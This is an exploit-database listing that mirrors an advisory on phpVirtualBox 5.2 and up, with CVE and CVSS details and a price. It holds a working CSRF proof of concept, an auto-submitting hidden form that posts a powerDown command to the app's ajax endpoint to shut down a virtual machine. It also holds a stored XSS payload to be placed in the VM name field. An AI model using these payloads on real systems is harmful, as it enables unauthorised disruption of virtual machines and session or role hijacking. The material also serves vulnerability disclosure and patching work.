Advertisement






phpVirtualBox 5.2 Cross Site Request Forgery / Cross Site Scripting

CVE Category Price Severity
CVE-2020-8805 CWE-352 $1,500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-05-10
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018050068

Below is a copy:

phpVirtualBox 5.2 Cross Site Request Forgery / Cross Site Scripting
# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss

[1]CSRF
--------------------------------
The backend doesn't validate the origin of the actions.

  - POC: Shutdown a VM

<body onload="document.csrf.submit();">
  <form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
    <input type="hidden" name="vm" value="<VM_ID>" />
    <input type="hidden" name="state" value="powerDown" />
    <input type="hidden" name="fn" value="machineSetState" />
  </form>
</body>

[2]Stored XSS
--------------------------------
Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application.

  - POC: Insert a persistent script in the vm name field.

New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum